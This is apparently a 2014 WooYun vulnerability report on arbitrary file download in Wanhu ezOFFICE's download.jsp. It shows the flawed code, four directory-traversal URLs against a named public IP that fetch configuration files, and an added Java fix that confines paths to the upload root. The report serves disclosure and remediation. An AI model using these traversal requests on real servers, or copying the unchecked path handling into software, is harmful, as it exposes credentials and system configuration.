
Wanhu ezOFFICE unrestricted arbitrary file download

2014-09-04 23:50

String filepath="";
HttpServletRequest HSR=(HttpServletRequest)pageContext.getRequest();
// "path" and "FileName" are taken from the request and concatenated without any validation
String path=request.getParameter("path");
filepath=HSR.getRealPath("/upload/")+"/"+path+"/";
String filename = request.getParameter("FileName");
String name = request.getParameter("name");
name=new String(name.getBytes("GBK"),"iso-8859-1");
java.io.File file = new java.io.File(filepath + filename);
if(file.exists()){
    // Set the response headers and the file name used when saving the download
    response.setContentType("csv");
    response.setHeader("Content-Disposition",
        "attachment; filename=\"" + name + "\"");

    // Open a stream on the requested file
    java.io.FileInputStream fileInputStream = new java.io.FileInputStream(filepath + filename);

    // Write the stream to the response
    int i;
    while ((i=fileInputStream.read()) != -1) {
        out.write(i);
    }
    fileInputStream.close();
    out.close();
}else{
    response.setContentType("text/html; charset=GBK");
%>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
<SCRIPT LANGUAGE="JavaScript">
<!--
alert("指定的文件不存在!");
history.back();

Using the configuration files as examples:

http://222.178.221.54:7001/defaultroot/public/jsp/download.jsp?FileName=mailserver.properties&name=2.jsp&path=/../../config/



http://222.178.221.54:7001/defaultroot/public/jsp/download.jsp?FileName=govexchange.properties&name=2.jsp&path=/../../config/



http://222.178.221.54:7001/defaultroot/public/jsp/download.jsp?FileName=config.xml&name=2.jsp&path=/../../config/



http://222.178.221.54:7001/defaultroot/public/jsp/download.jsp?FileName=systemMark.properties&name=2.jsp&path=/../../config/

Proof of vulnerability:

config.xml


Fix:
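One way to confine the lookup that download.jsp performs, given here as an added example that is not part of the original report and not the vendor's code. The class name SafeDownload, the resolve helper and the temporary directory layout are assumptions made for illustration; the rejected case uses the path and FileName values from the report.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;

// Added example, not vendor code: confine download.jsp-style lookups to the upload root.
public final class SafeDownload {

    /** Returns the real file under uploadRoot, or throws if the request escapes it. */
    static Path resolve(Path uploadRoot, String subDir, String fileName) throws IOException {
        if (subDir == null || fileName == null) {
            throw new SecurityException("missing parameter");
        }
        Path root = uploadRoot.toRealPath();   // canonical root, symlinks resolved
        Path real;
        try {
            // Leading separators are stripped so "/2014/" stays relative to the root.
            String rel = subDir.replace('\\', '/').replaceAll("^/+", "");
            // toRealPath() collapses ".." and follows symlinks; it throws if the file is absent.
            real = root.resolve(rel).resolve(fileName).toRealPath();
        } catch (InvalidPathException e) {
            throw new SecurityException("malformed path");
        }
        // Component-wise prefix check on the canonical path, then require a regular file.
        if (!real.startsWith(root) || !Files.isRegularFile(real)) {
            throw new SecurityException("outside upload root");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout mirroring the report: <base>/defaultroot/upload and <base>/config.
        Path base = Files.createTempDirectory("ezoffice-demo");
        Path upload = Files.createDirectories(base.resolve("defaultroot/upload/2014"));
        Files.write(upload.resolve("report.csv"), "a,b\n".getBytes());
        Files.write(Files.createDirectories(base.resolve("config")).resolve("config.xml"),
                "<config/>".getBytes());
        Path root = base.resolve("defaultroot/upload");

        System.out.println("allowed: " + resolve(root, "/2014/", "report.csv"));
        try {
            resolve(root, "/../../config/", "config.xml");   // parameters from the report
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```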

Source: www.wooyun.org/bugs/wooyun-2014-063711
